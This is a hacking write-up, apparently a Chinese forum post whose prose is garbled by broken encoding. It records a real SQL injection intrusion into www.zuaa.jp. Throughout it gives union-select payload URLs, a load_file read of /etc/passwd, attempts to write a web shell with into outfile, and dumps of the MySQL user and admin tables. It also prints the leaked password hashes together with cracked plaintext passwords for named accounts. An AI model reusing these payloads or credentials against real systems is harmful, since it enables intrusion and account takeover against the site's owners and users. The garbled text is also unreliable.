ԭ ⺺վȫ
www.zuaa.jp0x01. www.zuaa.jp ռ
whatweb
NMAPɨ
йˣhttp://www.political-security.com/ ṩ֧
0x02.ע
ע㣺http://www.zuaa.jp/php/newsdetail.php?topic_id=390
0x03.order by
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
order by 28order by 27
0x04. unionֶѯ
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ӵ 27 ʱʾ
йˣhttp://www.political-security.com/ ṩ֧
0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
user: root@localhost
database: openpne
version: 4.1.22
os: portbld-freebsd5.4
0x06. rootû
load_file(0x...), ļ (/etc/passwd), Ҳ hex(load_file(0x.....)), Ȼѵõ hex ,תַģַ Թվ
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ͨת
йˣhttp://www.political-security.com/ ṩ֧
0x07. into outfile
ȫʧ
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
ҳʾMDB2 Error:syntax error
0x08. mysql 4.1
³ֶδ sqlmap
йˣhttp://www.political-security.com/ ṩ֧
0x09. Һ̨
еĸ ̨߳Զ
0x10.MySL
ǰ nmap ռϢУԿ mysql 3306 ˿ ,Ե mysql û룬Ȼͨ mysql www.zuaa.jp
mysql ( 4.x 5.) ԴĶ mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
www.cmd5.com
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
ʧܣ˵ǽֻضIP岻֪
0x11. վͻ
վԴ openpne, google openpne Դ
0x12. ĬϢ
http://sns.zuaa.jp/?m=admin&a=page_login
(c_admin_user) ֶusername,password
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
zuaajp:c0923ec5857796a393da99905008c176, zju1897
йˣhttp://www.political-security.com/ ṩ֧
0x13. ¼̨
0x14. С
վϢͻ վϢͻ վϢͻ վϢͻ
лȺ ---- -˧ ṩע ṩע
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
йˣhttp://www.political-security.com/ ṩ֧
ֻϴ̳ôѧϰԭߣԭˣ
ĸţ ѵ⾢ ֵ
ҳ:
[1]